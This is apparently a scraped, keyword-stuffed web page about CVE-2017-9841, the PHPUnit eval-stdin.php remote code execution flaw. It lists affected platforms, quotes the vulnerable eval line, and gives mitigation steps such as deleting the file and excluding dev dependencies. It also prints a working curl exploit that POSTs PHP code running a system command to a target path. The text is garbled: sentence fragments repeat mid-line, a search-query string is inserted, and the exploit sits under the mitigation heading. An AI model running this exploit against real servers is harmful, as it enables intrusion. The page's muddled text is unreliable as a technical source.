WAR ROOM
WAR ROOM
video links
WAR ROOM

Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Cve [top] -

The requested path refers to CVE-2017-9841 , a critical remote code execution (RCE) vulnerability in

  • Craft CMS: Many shared hosting deployments left PHPUnit inside vendor/.
  • Magento (Adobe Commerce): Older versions required manual removal of the test directory.
  • Symfony & Laravel apps: Developers who deployed with --dev flag inadvertently enabled the RCE.
  • WordPress plugins: Hundreds of premium plugins bundled PHPUnit as a dependency inside their distribution ZIPs.

The eval-stdin.php script in PHPUnit contains the following code: vendor phpunit phpunit src util php eval-stdin.php cve

eval('?>' . file_get_contents('php://stdin')); The requested path refers to CVE-2017-9841 , a

Mitigation and Prevention

curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -d "<?php system('id'); ?>" Craft CMS : Many shared hosting deployments left

  • Delete vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php from deployed artifacts.
  • If you deploy via Composer, add a post-install/remove script to delete the path or exclude dev dependencies from production installs.

composer update phpunit/phpunit